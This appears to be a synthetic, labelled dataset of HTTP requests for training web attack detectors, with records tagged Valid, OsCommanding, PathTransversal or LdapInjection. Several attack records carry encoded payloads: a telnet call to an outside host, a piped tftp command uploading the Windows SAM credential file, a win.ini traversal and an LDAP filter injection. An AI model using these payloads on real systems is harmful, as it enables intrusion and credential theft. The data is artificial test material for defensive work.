Referer: http://nhmi5esm.biz/Eesaomer/5abatdrT/gea6s/Et47k/rjae.conf
TE: deflate,trailers,chunked;q=0.8
Trailer: Range
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 7.0; ys-lt; rv:6.7.0) Gecko/40829334
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 437x821
Via: hoDeq1/3.1 www.zeeHI.css, FTP/0.4 170.234.168.148
Transfer-Encoding: identity
Upgrade: wsry/3.9, n3Lf/9.4, otoco/2.2
Warning: 611 112.166.154.58 "obetc9" 
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0etcncEj5ItOTi=tnnott&Wm9link9y=oDrejHyq&ghTLnbao=sdnq<mthltr =o

End - Id: 4878
Start - Id: 43448
class: OsCommanding
GET /yhe/ndGd8.pPi8.55J07t/xvTinputs-bdqlQ/rxIkaa8Tq@Crx/1Z7qbVYX-sorAR./N3y6.mi4/veurlesdniftslt/us.js?ruDerduuehqst=%5C%22++++%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++++www.nstera.com++++88729%5C%3B&aEEmx=dbm4&xuiOJ-J@1Q4C=ig3hheQthtda6d&k7oGuincludeu2Mm2r=o%27e%5Binput&mapha6xtt3c=r08asEgdoallO1&lm3hBoNh=log%26r9 HTTP/1.1
Host: 110.204.23.18:58493
Connection: tutn
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: hyvqoe-stgh;q=0.6, eti2lDi-eve, ci-1rm;q=0.2
Cache-Control: no-store
Client-ip: 107.215.79.167
Cookie: j14R=xml:setef1iahT0(;emaeod5rtos=ldmRgN@f;b2vasieoeh=mrcBnHE1Lbv;etIlrxaot9rdUu=0;b3l@bwhereform8HGTa=rRzvk0;t0stSteEe=catap4i
Cookie2: $Version="5"
Date: Sun, 01 Jan 06 13:59:16 UTC
ETag: "UWj2c5HfBtFSJ6LTOYlT"
Expect: 100-continue
From: Etwo@t45aetl.it
If-Modified-Since: Fri, 28 Dec 07 05:17:01 UTC
If-Unmodified-Since: Thu, 08 Oct 09 11:56:33 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jun 09 11:40:45 CET
Max-Forwards: 040
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: senaTy nseaDz=wasioi
Authorization: ageimf tsuh=rirnset
Range: -0418,311-
Referer: http://tpIWxn.ch/locdeuM/dn9l/stalmsmn/idrtr.pdf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: esrtbufaouweyse
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 2.8 55.74.242.247:832, 0.5 www.oegeNlc0.shtml
Transfer-Encoding: identity
Upgrade: M4r/6.8, Aiye/1.9, wtraey/9.2, Ana/1.3, Na5he/7.8
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 52.147.136.153
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43448
Start - Id: 16602
class: Valid
GET /inem_Be/ehufcv/ag0JBqU1ZBvYjoDIT/nKBTe4UFen/UppasswdVN7QMFfd9/sOupJqaQrJPY1C/ennoanrmwanislur.jpeg?nsoat=sHnDMwg&t0te9ucnob=akzp%40ZrqwJ&aasnxw0f=%29e0em&utmrmoboFrcIr=aXeeCSDlkO&pcio=bnv9rt&u1nya=rqkX-hgi&6duuL366intaca=4431&nhaghsotg=tymierga HTTP/1.0
Host: 211.134.80.60
Connection: close
Accept: text/*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 115.162.152.91
Cookie: tnhgsnhahh=-Ys77;oo=ois;baa=74114;BZaQ_FLtV=3;tAroa=624;ihnshn=orhhk2Eeuesmaamzo
Cookie2: $Version="845"
Date: Fri, 12 Jun 09 20:00:20 UTC
ETag: "MX6JygOzoRFse2K7NF7"
Expect: lenu=baie;r4Re1
From: dwou@hguthnrf9e.org
If-Modified-Since: Thu, 01 Jul 04 19:41:37 GMT
If-Unmodified-Since: Tue, 19 Apr 05 18:37:30 CET
If-Match: "eOO3s4ImgYYQQhrQzMbB"
If-None-Match: "89KINCCt.sROsbch7"
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 3
MIME-Version: 6.1
Pragma: ecliso2e=n57sees
Proxy-Authorization: Digest qop=ensne
Authorization: Digest nonce
Range: -508053,86460-25,-68
Referer: http://ar9yee.it/hse3sue.txt
TE: trailers
Trailer: Connection
User-Agent: 513oeivn (t3MWWim; bqoTFHIyi; sGnGdUhn; a7@95@35Z)
UA-CPU: StrongARM
UA-Disp: 049,0120,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1536x5641
Via: 0.3 www.errIrao.css, 4.1 www.aess.jpg
Transfer-Encoding: deflate
Upgrade: 0tn1/4.2, i3Nra3/2.7, qFuk9/3.6, ea4chA/8.5
Warning: 302 www.iatetm.shtml "Tetamelsqnttnkl0otnA" 
X-Forwarded-For: 155.254.22.166
X-Serial-Number: 4070028617537255
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16602
Start - Id: 44599
class: OsCommanding
GET /4Foi0s24ru3/L@NCX3-ZCkfAJ5/ryurEbeue/wDilnQXedXN-iI5ugq/dvhtUOoo/apasCdlirleihn/fGTSux.exe?8onm=371405&ropKg0ytgNzdr7=tirfelmptew&45ueoA5rievh=teoyngIlt9&cxDhli89enliq=677&gtnyvePeilim=nrs2ogselectA%26dgSxe&attuepOrto=anjooy6w&E1Pn-SHe%u9access_log=o%24n&bboot.ini2J6ITK.qJk=43.131.64.31++++%7Ctftp+++++-i+++4.148.41.243+++++PUT+sam._&6chcnmedei=7862162229 HTTP/1.0
Host: 220.148.109.202
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-greek, windows-1252;q=0.5, x-mac-arabic, iso-10646-ucs-2;q=0.3
Accept-Encoding: deflate;q=0.0, compress, identity, compress, gzip;q=0.6
Accept-Language: Nrz-tE3;q=0.4, g-yeantue, nhjSj-nSn;q=0.0, 4e-v2co
Cache-Control: YhKroqav=oi
Client-ip: 97.130.78.86
Cookie: ntfs3mr=sosyertlivdwd4ains
Cookie2: $Version="67"
Date: Wed, 22 Mar 06 06:20:35 CET
ETag: "p_P9vOiouaIKD.F3Dkb-"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Wed, 05 Nov 08 24:03:27 UTC
If-Unmodified-Since: Sun, 04 Feb 07 14:56:24 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Apr 04 14:46:39 GMT
Max-Forwards: 1061
MIME-Version: 1.7
Pragma: 5b=muTns
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: NTLM c2Rhb2VhNGNwclM2c2dyc3NzY2hzZGFzc210dHVsNmhl
Range: 7-3,62874-04
Referer: http://www.iDu5n.de/sbiNhcas/oi4veM/e1aomp.aspx
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/0.1 (X11; U; Open BSD i586 9.6; o9-se; rv:1.0.6) Gecko/89985648
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.4 254.146.58.34
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 099 188.171.255.136 "sresnpusmMne" "Wed, 01 Apr 09 06:36:17 GMT"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44599
Start - Id: 14034
class: Valid
GET /dbechoR6kZ/nr08lvibdtN.js? HTTP/1.1
Host: 100.232.9.239
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.6, hz-gb-2312;q=0.5, hz-gb-2312;q=0.1, x-mac-turkish
Accept-Encoding: gzip, identity;q=0.5
Accept-Language: *;q=0.9
Cache-Control: min-fresh=46334
Client-ip: 185.231.121.162
Cookie: 7nyskjl3N=7;t8whrtythaqri=rsThk
Cookie2: $Version="5"
Date: Thu, 15 Jan 09 15:13:05 UTC
ETag: W/"mZ7T9k.3qtOxWWdp2KS"
Expect: awtWbm=tdPh;Ao4ive
From: aeeaqe@ea10ef.st
If-Modified-Since: Tue, 24 Jul 07 08:03:51 GMT
If-Unmodified-Since: Wed, 31 Mar 04 06:52:35 CET
If-Match: *
If-None-Match: "@xjAXGNOyoNjSrU"
If-Range: Fri, 24 Jun 05 21:34:12 GMT
Max-Forwards: 87
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic YXZlMzU6aTJtdTVlUmk=
Authorization: NTLM dGF0dGNpOW5vYWdlNnRyZWZ1bXNyc29ldGhlbm50ODQ0YWFhaWVzZW93ZW5lQ3Vo
Range: 92-
Referer: http://draci.fr/ee4is.txt
TE: deflate,gzip;q=0.4
Trailer: Date
User-Agent: Mozilla/6.1 (X11; U; Open BSD i386 2.4; oc-6o; rv:9.4.7) Gecko/86372347
UA-CPU: x86
UA-Disp: 7781,2537,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8443x481
Via: FTP/3.8 www.aalah6i4.html, HTTP/4.6 www.gd0o.gif
Transfer-Encoding: gzip
Upgrade: iQr/6.2
Warning: 285 12.210.81.67 "VnnPEeqt6bdltiru" 
X-Forwarded-For: 70.126.200.109
X-Serial-Number: 0043438224132828242
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14034
Start - Id: 29860
class: Valid
GET /Ebs1xFee5b4hnUe2i.jsp?rcpbgDVCQ8=ync3ghvrtogsUn&ili0a85rotytel=ikuqjy HTTP/1.1
Host: 147.11.173.174
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, gzip, gzip;q=0.3, identity
Accept-Language: lT-h0daeiu, llo-niElt, ln-sermt;q=0.9, ihH-aee;q=0.7, 6isw8one-k5dlthxr
Cache-Control: no-transform
Client-ip: 79.194.70.87
Cookie: tNApt2=hatlnegchenfgta;Ym61B=uglf in>;?hN|3autoexec3Eih;fhthenawigelhk=connectNgn;qResc=3::ghtacces9ttpee4t@ie;cn=1
Cookie2: $Version="927"
Date: Sun, 18 Apr 10 12:52:27 CET
ETag: W/"ZnCjVM6hgU@K8Mhip"
Expect: etPm=nrnm;ogeaanT
From: hggtsom6@ieylr.uk
If-Modified-Since: Sat, 30 Oct 04 11:14:47 UTC
If-Unmodified-Since: Sun, 08 Apr 07 23:43:44 CET
If-Match: *
If-None-Match: "7ELha6dL.pscDw@"
If-Range: "vM@Ofj4Df9QMi_tTq"
Max-Forwards: 025
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest response="45DcFe932F9403C0A2bd6e0bCfDd5a07"
Authorization: gysyz 0cnx=o5Qpe
Range: -0,-313,82-35861
Referer: http://aTizane.com/soRR/o6Nxus/anaotf.tar
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: eeceueh/6.2
UA-CPU: MIPS
UA-Disp: 724,467,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 952x914
Via: 8.2 124.134.162.172, 3.6 188.212.89.177:62, 6.4 109.248.32.61
Transfer-Encoding: iloa
Upgrade: eiseh/5.9
Warning: 570 101.76.63.64 "qhHehxa5pope" 
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 82258082988548
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29860
Start - Id: 19972
class: Valid
GET /npNlesgie8oyeswrrna.js?0enITstrYue=npacikdcxd-imi&P5HK=22pn2DSp&iPda=iqSZ&Ov5trrmrlsie=741563&etwwaynSr3tv=tmpms&RMrcpNbn=e%2Fwelyuq0Wsge%28o&ea=+-%7Erp+hyH&prrnetns4n3Dne=asuameoit2tI2&durq7rndr=cnlordnilgd&tn=trmN&42l9eFs=siframes7formoum%3Fdrn&stet3Ra=it0jitkseVjs+ HTTP/1.0
Host: 146.203.64.138
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, identity;q=0.9, compress, deflate
Accept-Language: uwa-utjoHgg1;q=0.5, odIfAd-8pm7aii4
Cache-Control: max-age=71769
Client-ip: 246.222.154.154
Cookie: evg=3betweeni+wt;G58l2<s;sx=30048826
Cookie2: $Version="6"
Date: Thu, 11 May 06 15:09:13 UTC
ETag: "fRp.j_Sd1JFJKYu"
Expect: 100-continue
From: ev5k8ia@ptMesO.net
If-Modified-Since: Tue, 04 Aug 09 19:16:49 GMT
If-Unmodified-Since: Fri, 25 May 07 11:38:29 GMT
If-Match: "YegtGlhuDbGdtBhcL"
If-None-Match: "E907NxErkhPzU0iFdzJp"
If-Range: Tue, 25 Aug 09 04:20:01 UTC
Max-Forwards: 641
MIME-Version: 7.3
Pragma: cE2Eol=matrah
Proxy-Authorization: NTLM bm56ZW9haG4wbXNhb250ZWJoZWhobXRoemR3dGhsa3R0dXcxdGVuc3JhZWxsaQ==
Authorization: aEgtRe LnUeieo=i6inNiU
Range: 9-166,607515-,166-662139
Referer: /cmEiwD5a/05ljair.zip
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: iAwsqtcgu (mj5x@VhK; jpj6@Ky)
UA-CPU: StrongARM
UA-Disp: 773,5885,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 772x118
Via: FTP/8.4 www.srqi.png, FTP/6.2 www.bagiqaan.png, 2.5 6.135.218.184
Transfer-Encoding: compress
Upgrade: scjah/2.9, rqic/8.5, Eucg/8.4, 50h/6.8
Warning: 269 www.sio9tfe.jpeg "ertsEceeNmilreasie" 
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19972
Start - Id: 45532
class: PathTransversal
GET /hav1l6tC/ua_YfNLx_gYFMA4/mh/ormie/8ndazehIriEatioyoe/axf9u38A8hHp4J/nM8G/e8stTtuat.htm?location419HUG2=JngP&omnnse1=m%3A%5C%5CWINNT%5C%5Cwin.ini&eweltena=n%3F HTTP/1.0
Host: www.iwm9c.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.8, macintosh;q=0.3, cp-950;q=0.0, euc-cn;q=0.9
Accept-Encoding: identity, gzip, deflate;q=0.8, identity
Accept-Language: 8eorCyso-khnvyse;q=0.0, rbed8sn-maeaa;q=0.5, tiO1ed-c;q=0.6
Cache-Control: no-cache
Client-ip: 228.114.110.173
Cookie: sQ7DK0ke=69607322;u_if=0242135
Cookie2: $Version="04"
Date: Thu, 21 Jul 05 20:41:06 CET
ETag: "Ze@vy62aYSghPKIo"
Expect: ax8lncn
From: aFhd@iesknmut3c.net
If-Modified-Since: Sun, 23 Mar 08 07:51:40 GMT
If-Unmodified-Since: Sat, 22 Jan 05 05:09:12 GMT
If-Match: *
If-None-Match: *
If-Range: "NobdZfNtglYhDQNP"
Max-Forwards: 2195
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM YzVhaXRubjBlOG9vdDZtd21pa05oZm1udGFFRWlrdWxXbGlvaW0=
Authorization: NTLM aDRlZGZzcmhvYXlpdVV0aW41czVzc282cnI2ZkFrdGx0aQ==
Range: 903-3,3-4324,-8
Referer: /a8uEsAat/yotrne/A6r54P/berwe/tsni.asp
TE: trailers
Trailer: Accept
User-Agent: Mozilla/7.1 (compatible; eSe7e; Windows NT; tHosesfseu; at5tVCUws)
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 589x0586
Via: 6.5 www.tsIl.jpeg, HTTP/7.7 14.128.46.32, 1.6 227.195.95.56
Transfer-Encoding: identity
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45532
Start - Id: 4475
class: Valid
PUT /iljHZhvDXwek./sqonye.nsf? HTTP/1.1
Content-Length: 71
Content-Language: h3uemi,r,y2tudp
Content-Encoding: gzip
Content-Location: /wxEoc/orosrir/rn95ee.html
Content-MD5: d2xlaWdydGVzZWdvb2VkYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Sep 07 21:50:15 CET
Last-Modified: Fri, 25 Jul 08 01:04:42 GMT
Host: www.eb4a.cz:397
Connection: JdosloT
Accept: audio/x-wav, image/*;q=0.9
Accept-Charset: cp-950;q=0.9, iso-8859-3, iso-8859-8, iso-8859-7
Accept-Encoding: *
Accept-Language: 8-eetyepoq;q=0.6, e-hito;q=0.0, yee5etah-i45sne;q=0.0, aemndd-dp;q=0.9
Cache-Control: only-if-cached
Client-ip: 157.6.94.128
Cookie: cgsnno=245904959;ssi=60748660;hoFyt=0268647;oien=018178
Cookie2: $Version="357"
Date: Sun, 02 Sep 07 12:13:55 UTC
ETag: "T1Np.U00Gp9bgT5HkM7R"
Expect: 100-continue
From: eneiwbe@rqreia1soo.ch
If-Modified-Since: Tue, 17 Nov 09 11:48:41 UTC
If-Unmodified-Since: Wed, 14 Dec 05 05:14:52 GMT
If-Match: *
If-None-Match: "J7kkO7lVbhqCW2ws."
If-Range: Sun, 04 Jan 09 04:30:42 UTC
Max-Forwards: 850
MIME-Version: 8.8
Pragma: nsDx6='dtautjn'
Proxy-Authorization: Basic aW5qdnVwdXI6bzFTcHB6TQ==
Authorization: NTLM azVUaTc5dmY4c2xnblJlb3BubjVFeHJ0c2lyZG9hSDdvdHdvc3Jl
Range: 47-43864,-075,-7838
Referer: /AO2lioyp/Idge6/f3te.mp3
TE: gzip;q=0.6
Trailer: Accept
User-Agent: Mozilla/4.1 (X11; U; Unix 6.9; or-Wd; rv:4.1.4) Gecko/05034243
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 421x3151
Via: 0.6 www.isenSimd.jpeg, FTP/0.8 www.1sete.tiff, 4.4 www.entsa.gif
Transfer-Encoding: compress
Upgrade: Ncnd/9.0, sne/9.0, e0cb/3.5, la4/2.0, sjR/3.7
Warning: 512 233.21.168.235 "8w0fheinetpez" "Sun, 23 Jan 05 24:46:33 GMT"
X-Forwarded-For: 108.74.212.152
X-Serial-Number: 944553276
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

elaN=sowrfep8echhqirnaO&twopxkjateslo=uaRTeehc&RvxreettUq=[b1zotrsgi 

End - Id: 4475
Start - Id: 27998
class: Valid
GET /p_P.tiff?tearktt9=wE_7Kggv7yc4&511YEylreplacenO=Dit7mfur1na&aetpot9Trss69=n%24ao&hrmohbpu=52274 HTTP/1.0
Host: www.utgq5crae.it
Connection: ratet
Accept: */*;q=0.4
Accept-Charset: iso-8859-9, us-ascii;q=0.6
Accept-Encoding: *
Accept-Language: osr-5, i-Oai6;q=0.6, irlen-F
Cache-Control: max-stale=5
Client-ip: 224.11.183.71
Cookie: urnahttxb2=amUnruSZP-73;iqoe=11;httpeHPjsLbzgroup byh=4826
Cookie2: $Version="827"
Date: Fri, 11 Mar 05 04:53:14 GMT
ETag: "zQfqi@-Y3CziAdDLRRe"
Expect: 100-continue
From: usplne@arhcernjr.cz
If-Modified-Since: Fri, 07 Aug 09 04:28:58 UTC
If-Unmodified-Since: Sun, 13 Jan 08 06:24:39 CET
If-Match: "qONMI5GFAszBXzLV4AI"
If-None-Match: ".lKb_g7o-STM9KmSzE"
If-Range: Thu, 25 Feb 10 19:27:26 CET
Max-Forwards: 6272
MIME-Version: 0.5
Pragma: ehso=tnmcub
Proxy-Authorization: NTLM aTluaGc4dnB1Z2xlaW9Fb3dvMkhvenVubG5pZXZvaWdtR2lyTnNuYQ==
Authorization: Basic cmZlY251RTp0bndzdQ==
Range: 8-0682,02-75,632-32413
Referer: /ssFfo/tNe9eNNo/ujmteset/nTnwso.mdb
TE: trailers
Trailer: Range
User-Agent: Mozilla/3.8 (compatible; Konqueror/2.5; Win 9x; kaeemho3; hn8tt; espn7b)
UA-CPU: x86
UA-Disp: 0910,8594,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7575x0487
Via: Ctt2on/1.3 225.84.75.76:6, 1.8 www.ioritaFC.png, FTP/6.0 www.tdeo8i.jpg:9129
Transfer-Encoding: gzip
Upgrade: 5Dytss/2.7
Warning: 062 www.igeI.shtml "vilnsns" 
X-Forwarded-For: 54.46.58.97
X-Serial-Number: 548711116
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27998
Start - Id: 962
class: Valid
GET /yorefh9/afaiceee/omBtytOhrrrE/eyFMQkwUBS.7a6Jb0@W/aBuMZ2K/ea@YK.hnysVQtL@v-j/4mailacceptyw2sLhH-U@y/jn4m.php3? HTTP/1.0
Host: www.pYbdNhfHue.de
Connection: mpnoe
Accept: audio/*, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lnare-unaad
Cache-Control: max-stale
Client-ip: 82.195.65.170
Cookie: t3ishsoe=29;oPdNfoY03hh0afa=7;qio=1
Cookie2: $Version="446"
Date: Fri, 14 Dec 07 18:25:24 GMT
ETag: W/"nGeVxugnjpjlbqAbIA"
Expect: 100-continue
From: drgltVi@44huhi.be
If-Modified-Since: Thu, 23 Apr 09 07:40:15 GMT
If-Unmodified-Since: Sat, 21 Jun 08 03:28:33 GMT
If-Match: ".oCQEXzek@vQRAgsy1"
If-None-Match: "I4utuA4dwgKq.HUCg"
If-Range: "yuoZZYMwaYgWQ1TF2qJ"
Max-Forwards: 21
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.oan8.com/1alaeNs/ecNt3r/gaimg/LiucI.pl
Authorization: Basic N2VjaTp0bzVt
Range: 93711-32096
Referer: http://Osilr.de/mlohtb/rdelaoo/siwowsw/0kaacs/bhetdf.php
TE: trailers
Trailer: Connection
User-Agent: Mozilla/7.6 (Windows; U; WinNT 4.9; t1-ra; rv:4.8.3) Gecko/31686308
UA-CPU: 68000
UA-Disp: 710,919,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3648x172
Via: 6.0 www.heeiooss.js, FTP/7.4 215.47.49.10
Transfer-Encoding: identity
Upgrade: speh/3.3, Eai/0.1, hYun/9.4, uabeh/7.5, 8re3/1.6
Warning: 722 37.71.188.90 "iftrtm47sdah" "Fri, 17 Jul 09 01:24:55 UTC"
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 5433664
----: ------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 962
Start - Id: 2290
class: Valid
GET /syyd7ouenrr/pQ/JY1Oc0qLKB/-TRsamohtaccesvSscriptZsTo/-cav60/ipher3mh/ratqgao9nrons/PSinputRn5L/7Hb.css? HTTP/1.1
Host: www.b19st.st:80
Connection: keep-alive
Accept: image/gif;q=0.6
Accept-Charset: windows-874, iso-8859-7;q=0.5, iso-10646-ucs-2, iso-2022-jp, iso-2022-kr;q=0.6
Accept-Encoding: 
Accept-Language: u-e, sexmnen-iah;q=0.9, mpit-lh1oo, Cz0f-rheiano;q=0.8, ml-boone
Cache-Control: no-cache
Client-ip: 180.110.57.247
Cookie: hd4n6inen=m983VS;7n0roaebetyHboi=acl@zcnfxnetcata
Cookie2: $Version="971"
Date: Fri, 01 Dec 06 21:08:09 UTC
ETag: W/"lNqUNaPov_L-Lu5n"
Expect: 100-continue
From: aetpir@0smuinHo.ch
If-Modified-Since: Sun, 14 May 06 24:29:56 UTC
If-Unmodified-Since: Thu, 10 Jan 08 24:21:22 CET
If-Match: *
If-None-Match: "GjlT1AZ1EV_CY98"
If-Range: "kB3dSZDxD3.YRVk"
Max-Forwards: 408
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM OHdjc2xva2VhcmVzZXNsMTNhc2FlM2x1Y2FyM2hhZXJjMlBl
Authorization: iuSil tlms=lSmdsiVg
Range: 737-
Referer: /nbrwnu.css
TE: chunked;q=0.3,gzip;q=0.5,trailers
Trailer: User-Agent
User-Agent: adbvaethhtHno
UA-CPU: 68000
UA-Disp: 090,2073,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6264x742
Via: atJi/6.5 www.dbet.jpeg
Transfer-Encoding: gzip
Upgrade: tjntna/3.8, spuo/6.9, tzncn/7.1, t2eh0/6.3
Warning: 647 238.244.132.185 "flrteahMclhsa" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2290
Start - Id: 39000
class: LdapInjection
GET /Qefywwehservices1/bhIeCu31vQrZ9fN@@b8j/let5erNAeceee/6rKyjWHRlsCeOnneszL/HsF3YfUrmuv/cxLxj/rlevatlxd4seHiecpnin/aCeATUGIAa02evs/eBRe/FHMFboot.inivIpGjP/ixi6og7leaXeetFi.gif?wrisncaeptqli=n2Q&bt=%29+%28++++%7C+++%28uamha%3Dmx*%29 HTTP/1.1
Host: www.fswhnAWoe.gov:80
Connection: aeeh
Accept: */*
Accept-Charset: *;q=0.8
Accept-Language: toeri-dA0qt;q=0.0, nq-09uog, ttntq-eihn
Cache-Control: no-store
Cookie2: $Version="21"
Date: Thu, 27 Dec 07 02:07:37 GMT
ETag: W/"obdJQCQK4xL.KIy31d2"
Expect: 100-continue
If-Unmodified-Since: Wed, 22 Dec 04 15:12:30 UTC
If-Match: "yiUZYeU0v7Y.G0zFve"
If-Range: Wed, 07 Jan 09 20:15:39 UTC
Referer: http://www.tNasu.biz/0eBnuttp/dtgwo.jsp
User-Agent: i_xuK4Mht http://www.ef42y3t.com
Via: HTTP/5.9 237.73.2.214:2, 2.5 www.eeieelt.tiff

null

End - Id: 39000
Start - Id: 21492
class: Valid
GET /dRVtxBzsb.jpg?oars=e6RHXD9g4kop&aLiAswoagt=6208669&r6=e%7EG&FDUvgrBfromGqfI=f%3C8ykma&nenwoo4svccPl=e&8zdata=534146667&kM9tlibdelete=665656&etScd5osaeslen=15&nrooruawh=fiwmSaobjectrjfeis%3E&rahHenee8emrk=575&wqangry1sosrIh6=%40orefa&9QbfWb=+fhndghp9d6%3A&rrhhhnle=9375985&euemtotTssOni=8212&7erhifiA5nahL=2957441 HTTP/1.1
Host: 181.33.60.23:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, iso-8859-6
Accept-Encoding: *
Accept-Language: wIt-1, 1ca1-Ilsi7p;q=0.7, onn6ito-t, nteo-fea;q=0.1, rm-lr
Cache-Control: no-transform
Client-ip: 164.95.11.25
Cookie: dutfwnyoaooss=rzmidiwsvlu ti 
Cookie2: $Version="185"
Date: Sat, 04 Jun 05 08:45:46 CET
ETag: "OjvcqtoKxqm_f3Sr4"
Expect: Wd1fssa=gTrite;esres
From: dhrh@ccph.com
If-Modified-Since: Thu, 24 Aug 06 01:39:39 CET
If-Unmodified-Since: Fri, 02 Nov 07 20:32:20 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 02 Dec 09 06:51:39 UTC
Max-Forwards: 587
MIME-Version: 9.7
Pragma: qiieis=hcahyma
Proxy-Authorization: NTLM ZUFlc2hncG5tZjZvMHNkcnRkdHNkWGluMWVrZWlkdHlzc2VuYg==
Authorization: Digest response="961CdD53DB4B4b589639B2efF2aCBd0C"
Range: 67973-
Referer: http://www.eenu.biz/adCoetn/eb9aeyc.php4
TE: trailers,deflate;q=0.2
Trailer: If-Unmodified-Since
User-Agent: daaoo9a (tnIOL1xo)
UA-CPU: PowerPC
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7753x3387
Via: HTTP/1.6 www.eeaGontt.shtml, 3.8 190.100.178.100:056, Wnhiwy/3.9 www.s5veael6.html
Transfer-Encoding: compress
Upgrade: Gdet/7.1, lls/8.3, tentT/7.4, uai/1.1, idxqE5/4.3
Warning: 494 169.6.156.254:4 "eeaEedTu0Sho4Ordn4" "Sat, 28 Oct 06 01:53:40 CET"
X-Forwarded-For: 188.118.250.187
X-Serial-Number: 15490998338905562
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21492
Start - Id: 13183
class: Valid
GET /ebMbiMm/ceeAorefccuielAo2/hYsUJqp3WxyPTnuRnaX/fmE44-tLQsep19R/tbW07/fTso.php3?hddsimbCilmc=3a+c%284%272oi&9oe5eamstsejp=4BJqEi&On8uh=719101&gOaenO=a.Ie&9o=2191740&Amema8=297384&eise=5&EtwlrtSmy=75895&f1wgetw-JT1@4=eWmcJx&aiei=cKviq&_GZzI0=netcat%2Fordsh HTTP/1.0
Host: 203.9.230.197:365
Connection: apoadnet
Accept: video/quicktime;q=0.5, video/mpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 169.235.34.90
Cookie: eloicmo=2ZZ@ob;wyasuBdyeRle=shadmin?;boLeipi7hrtgn=dldo2opena;bEJB3hyNwinntc9=union0dtcmdo;7qv@dsock_streamV=7515751684;li=12904974
Cookie2: $Version="095"
